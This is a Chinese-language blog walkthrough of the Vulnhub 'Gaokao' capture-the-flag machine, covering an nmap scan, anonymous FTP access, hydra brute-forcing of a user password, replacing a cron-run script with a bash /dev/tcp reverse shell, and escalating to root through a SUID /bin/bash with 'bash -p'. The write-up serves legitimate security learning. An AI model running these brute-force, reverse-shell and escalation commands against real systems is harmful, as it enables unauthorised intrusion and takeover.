guayu-kakeru
0%

Vulnhub-Gaokao

发表于 分类于

Vulnhub-Gaokao靶机复盘

端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
┌──(root㉿kakeru)-[~/tmp]
└─# nmap -A 192.168.179.139    
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-09 18:21 CST
Nmap scan report for 192.168.179.139 (192.168.179.139)
Host is up (0.0021s latency).
Not shown: 996 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     ProFTPD 1.3.5e
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 48:39:31:22:fb:c2:03:44:a7:4e:c0:fa:b8:ad:2f:96 (RSA)
|   256 70:a7:74:5e:a3:79:60:28:1a:45:4c:ab:5c:e7:87:ad (ECDSA)
|_  256 9c:35:ce:f6:59:66:7f:ae:c4:d1:21:16:d5:aa:56:71 (ED25519)
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Wellcome to Funbox: Gaokao !
3306/tcp open  mysql   MySQL 5.7.34-0ubuntu0.18.04.1
| mysql-info: 
|   Protocol: 10
|   Version: 5.7.34-0ubuntu0.18.04.1
|   Thread ID: 3
|   Capabilities flags: 65535
|   Some Capabilities: LongPassword, IgnoreSpaceBeforeParenthesis, ConnectWithDatabase, SwitchToSSLAfterHandshake, FoundRows, DontAllowDatabaseTableColumn, Speaks41ProtocolOld, SupportsLoadDataLocal, Speaks41ProtocolNew, LongColumnFlag, Support41Auth, InteractiveClient, IgnoreSigpipes, SupportsTransactions, ODBCClient, SupportsCompression, SupportsMultipleResults, SupportsAuthPlugins, SupportsMultipleStatments
|   Status: Autocommit
|   Salt: k%\x0E5s72S\x1B!+\x1F26p\x1C\x02I0T
|_  Auth Plugin Name: mysql_native_password
MAC Address: 32:5F:D8:FC:12:14 (Unknown)
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   2.11 ms 192.168.179.139 (192.168.179.139)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 36.03 seconds

信息收集

web端是一个默认的ubuntu界面,说明只是开放了http服务,但是没有内容.
ftp可以匿名登录,把这个welcome下载下来

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
┌──(root㉿kakeru)-[~/tmp]
└─# ftp anonymous@192.168.179.139
Connected to 192.168.179.139.
220 ProFTPD 1.3.5e Server (Debian) [::ffff:192.168.179.139]
331 Anonymous login ok, send your complete email address as your password
Password: 
230-Welcome, archive user anonymous@192.168.179.83 !
230-
230-The local time is: Sun Feb 09 10:23:22 2025
230-
230-This is an experimental FTP server.  If you have any unusual problems,
230-please report them via e-mail to <sky@funbox9>.
230-
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||8782|)
150 Opening ASCII mode data connection for file list
-rw-r--r--   1 ftp      ftp           169 Jun  5  2021 welcome.msg
226 Transfer complete
ftp> get welcome.msg
local: welcome.msg remote: welcome.msg
229 Entering Extended Passive Mode (|||51553|)
150 Opening BINARY mode data connection for welcome.msg (169 bytes)
100% |********************************************************************|   169       31.01 KiB/s    00:00 ETA
226 Transfer complete
169 bytes received in 00:00 (14.47 KiB/s)
1
2
3
4
5
6
7
8
┌──(root㉿kakeru)-[~/tmp]
└─# cat welcome.msg                                  
Welcome, archive user %U@%R !

The local time is: %T

This is an experimental FTP server.  If you have any unusual problems,
please report them via e-mail to <sky@%L>.

这出现了两个疑似用户的东西,尝试ftp登录看看

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
┌──(root㉿kakeru)-[~/tmp]
└─# ftp %U@%R@192.168.179.139    
ftp: Can't lookup `%R@192.168.179.139:ftp': Name or service not known
┌──(root㉿kakeru)-[~/tmp]
└─# ftp user@192.168.179.139 
Connected to 192.168.179.139.
220 ProFTPD 1.3.5e Server (Debian) [::ffff:192.168.179.139]
331 Password required for user
┌──(root㉿kakeru)-[~/tmp]
└─# ftp sky@%L@192.168.179.139
ftp: Can't lookup `%L@192.168.179.139:ftp': Name or service not known
┌──(root㉿kakeru)-[~/tmp]
└─# ftp sky@192.168.179.139    
Connected to 192.168.179.139.
220 ProFTPD 1.3.5e Server (Debian) [::ffff:192.168.179.139]
331 Password required for sky
Password:

尝试一下,发现可能有user 和 sky用户,用hydra爆破一下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
┌──(root㉿kakeru)-[~/tmp]
└─# hydra -l sky -P /usr/share/wordlists/rockyou.txt ftp://192.168.179.139 
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-02-09 18:40:46
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ftp://192.168.179.139:21/
[STATUS] 295.00 tries/min, 295 tries in 00:01h, 14344106 to do in 810:25h, 14 active
[21][ftp] host: 192.168.179.139   login: sky   password: thebest
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 2 final worker threads did not complete until end.
[ERROR] 2 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-02-09 18:43:31

成功得到sky用户的密码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
drwxr-xr-x   3 sky      sky          4096 Jun  6  2021 .
drwxr-xr-x   5 root     root         4096 Jun  5  2021 ..
-rw-------   1 sky      sky            56 Jun  5  2021 .bash_history
-r--r--r--   1 sky      sky           220 Jun  5  2021 .bash_logout
-r--r--r--   1 sky      sky          3771 Jun  5  2021 .bashrc
-r--r--r--   1 sky      sky           807 Jun  5  2021 .profile
drwxr-----   2 root     root         4096 Jun  5  2021 .ssh
-rwxr-x---   1 sky      sarah          66 Jun  6  2021 user.flag
-rw-------   1 sky      sky          1489 Jun  5  2021 .viminfo
226 Transfer complete
ftp> cat user.flag
?Invalid command.
ftp> get user.flag
local: user.flag remote: user.flag
229 Entering Extended Passive Mode (|||8837|)
150 Opening BINARY mode data connection for user.flag (66 bytes)
100% |********************************************************************|    66        1.67 KiB/s    00:00 ETA
226 Transfer complete

有个userflag,而且这个sarah是组成员,看看user flag

1
2
3
4
┌──(root㉿kakeru)-[~/tmp]
└─# cat user.flag                                    
#!/bin/sh
echo "Your flag is:88jjggzzZhjJjkOIiu76TggHjoOIZTDsDSd"

这个flag不是base64,但是这个user.flag不是一个简单的文本,它是一个sh脚本
所以肯定要用这个文件,我现在接触的sh脚本自己用的只有用来反弹shell,那我们就在ftp中上传反弹shell脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
┌──(root㉿kakeru)-[~/tmp]
└─# cat reverse.sh 
bash -i >& /dev/tcp/192.168.179.83/1234 0>&1
ftp> put reverse.sh
local: reverse.sh remote: reverse.sh
229 Entering Extended Passive Mode (|||58762|)
150 Opening BINARY mode data connection for reverse.sh
100% |********************************************************************|    45      255.49 KiB/s    00:00 ETA
226 Transfer complete
45 bytes sent in 00:00 (6.58 KiB/s)
ftp> mv reverse.sh user.flag
?Invalid command.

发现在ftp中没法重命名,我们就在本机改名上传

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
┌──(root㉿kakeru)-[~/tmp]
└─# cat user.flag 
#!/bin/sh
bash -i >& /dev/tcp/192.168.179.83/1234 0>&1

ftp> put user.flag
local: user.flag remote: user.flag
229 Entering Extended Passive Mode (|||34801|)
150 Opening BINARY mode data connection for user.flag
100% |********************************************************************|    55      383.64 KiB/s    00:00 ETA
226 Transfer complete
55 bytes sent in 00:00 (5.41 KiB/s)
ftp> ls -al
229 Entering Extended Passive Mode (|||62805|)
150 Opening ASCII mode data connection for file list
drwxr-xr-x   3 sky      sky          4096 Feb  9 11:04 .
drwxr-xr-x   5 root     root         4096 Jun  5  2021 ..
-rw-------   1 sky      sky            56 Jun  5  2021 .bash_history
-r--r--r--   1 sky      sky           220 Jun  5  2021 .bash_logout
-r--r--r--   1 sky      sky          3771 Jun  5  2021 .bashrc
-r--r--r--   1 sky      sky           807 Jun  5  2021 .profile
-rw-r--r--   1 sky      sky            45 Feb  9 11:04 reverse.sh
drwxr-----   2 root     root         4096 Jun  5  2021 .ssh
-rwxr-x---   1 sky      sarah          55 Feb  9 11:06 user.flag
-rw-------   1 sky      sky          1489 Jun  5  2021 .viminfo
226 Transfer complete

成功上传,然后在本地监听,得到shell

1
2
3
4
5
6
7
8
┌──(root㉿kakeru)-[~/tmp]
└─# nc -lp 1234          
id
bash: cannot set terminal process group (-1): Inappropriate ioctl for device
bash: no job control in this shell
bash-4.4$ id
uid=1002(sarah) gid=1002(sarah) groups=1002(sarah)
bash-4.4$

提权

在这里我卡了很久。
先看了一下sudo,但是sudo要密码
再查一下suid,我看这里都是/bin目录下的,随便选了几个去gtfobins搜了一下就没管了
我的思路是首先先用pspy64看一下定时任务
我发现了这user.flag是一个定时程序

1
2
3
4
5
2025/02/09 12:04:19 CMD: UID=0     PID=2      | 
2025/02/09 12:04:19 CMD: UID=0     PID=1      | /sbin/init maybe-ubiquity 
2025/02/09 12:05:01 CMD: UID=0     PID=27586  | bash -i /home/sky/user.flag 
2025/02/09 12:05:01 CMD: UID=1002  PID=27585  | /bin/sh -c bash -i /home/sky/user.flag > /dev/null 
2025/02/09 12:05:01 CMD: UID=0     PID=27584  | /usr/sbin/CRON -f

我就想着是这个定时任务里面有uid=0的,而且执行了bash -i /home/sky/user.flag
这难道是root也会执行这个定时任务?下面是sarah执行的这个任务,我拿到了sarah的shell
但是我在kali里面nc -lp 1234 了好几遍,都是返回sarah的shell。
后面经过群主提醒,这个bash的PS1有问题
在 Linux 中,PS1(Prompt String 1)是一个环境变量,用来定义 shell 命令提示符的显示内容和格式。一般普通用户的PS1以$结尾,root的以#结尾
在这个靶机中的PS1是bash-4.2$,没有显示路径,用户名,说明是一个受限的bash
所以用bash -p这个指令就可以得到root的shell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
^X-su-4.4$ find / -user root -perm -4000 -print 2>/dev/null
/bin/bash
/bin/su
/bin/fusermount
/bin/ping
/bin/mount
/bin/umount
/usr/bin/gpasswd
/usr/bin/traceroute6.iputils
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/procmail
/usr/bin/newgidmap
/usr/bin/newuidmap
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chfn
/usr/lib/eject/dmcrypt-get-device
/usr/lib/snapd/snap-confine
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
-su-4.4$ /bin/bash
bash-4.4$ bash -p
bash-4.4# id
uid=1002(sarah) gid=1002(sarah) euid=0(root) egid=0(root) groups=0(root),1002(sarah)

所以这个/bin/bash有suid是可以利用的,我直接忽略了。

1
2
3
-p(privileged mode,特权模式):
默认情况下,Bash 在以 SUID(Set-User-ID)或 SGID(Set-Group-ID)方式执行时,会自动丢弃 euid 并降权到 ruid 以避免安全问题。
但是,使用 bash -p 可以尝试保留 euid,从而继续以提升的权限运行 Bash(如果系统允许)。

另外刚才那个定时任务为什么有root的身份执行的行呢? 原因是这样的:如果拿apache服务举例,发现运行这个服务的不止有www-data的还有root,为什么每次拿到的shell都是www-data的呢?因为root只是负责服务的初始化等内容,这个服务还是归www-data所有的。
在这里也是,这个user.flag文件就是由sarah用户执行的。
现在我们在root的身份下可以去定时任务里面看看

1
2
3
4
5
6
7
8
9
bash-4.4# pwd       
/var/spool/cron/crontabs
bash-4.4# ls
sarah
bash-4.4# cat sarah 
# DO NOT EDIT THIS FILE - edit the master and reinstall.
# (/tmp/crontab.A5TLWA/crontab installed on Sun Jun  6 13:52:29 2021)
# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
*/1	*	*	*	*	bash -i /home/sky/user.flag > /dev/null

所以这个任务就是只有sarah这个用户执行的。
最后我还从群主ll104567那学到了一个东西,我一直都不知道,叫linpeas.sh

1
linPEAS 是一个用于 Linux 系统的特权提升脚本套件,旨在帮助进行后渗透测试时进行系统枚举和发现特权提升路径。 系统枚举:linPEAS 收集系统的广泛信息,包括用户、组、进程、网络配置、安装的软件等。 特权提升检测:它检查常见的配置错误和漏洞,这些漏洞可能允许攻击者在系统上提升其权限。

运行这个程序之后也能发现bash有可以提权的

1
2
3
6(CVE-2011-1485)
-rwsr-sr-x 1 root   root       1.1M Jun  6  2019 /bin/bash
-rwsr-xr-x 1 root   root        19K Jun 28  2019 /usr/bin/traceroute6.iputils

运行程序之后这个/bin/bash是黄底红色的。